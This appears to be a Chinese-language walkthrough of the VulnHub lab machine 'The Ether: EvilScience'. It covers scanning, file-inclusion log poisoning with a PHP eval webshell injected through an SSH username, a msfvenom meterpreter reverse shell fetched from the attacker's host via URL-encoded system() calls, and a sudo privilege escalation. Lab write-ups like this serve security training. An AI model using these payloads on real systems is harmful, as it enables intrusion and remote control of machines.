靶机下载地址:

https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '00:0C:29:7F:50:FB'

1.2. 端口扫描

nmap -p- 192.168.7.172

1.3. 目录扫描

 dirb http://192.168.7.172

1.4. 敏感信息获取

2. WEB打点寻找漏洞点

2.1. 老规矩，逐个点击功能点，查看可以利用的功能点

1.点击about us中url带有file协议，疑似存在文件包含漏洞，尝试利用文件包含的几个方式获权限

2.由敏感信息可知其服务器中间件是apache，文件包含可通过日志文件包含获权，尝试拼接默认目录 -> /var/log/auth.log路径无法访问？存在报错？？？ -> 尝试利用ssh登录报错注入进错误访问日志中

ssh "<?php eval($_GET[cmd]);?>"@192.168.7.172

3.尝试burp抓包，查看数据包信息

2.2. GetShell

1.拼接命令

2.打开kali，利用msf生成shell -> 同时打开msf的内部监听

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=4444 -f elf > shell.elf

msfconsole

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.7.36
set lport 4444

3.新启一个http临时服务，让靶机远程下载我们的shell.elf文件[起的服务一定要在shell文件同一目录开启]

python -m http.server 8001

、

4.在靶机网页逐个拼接下方链接

/?file=/var/log/auth.log&d1no=system('wget+192.168.7.36:8001/shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

监听器上线

3. 权限提升

3.1. 老规矩，msf上线先转shell，再利用python做持续化输出调配

shell
# 持续化
python -c 'import pty;pty.spawn("/bin/bash")'

3.2. 老规矩，查看用户执行命令权限

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami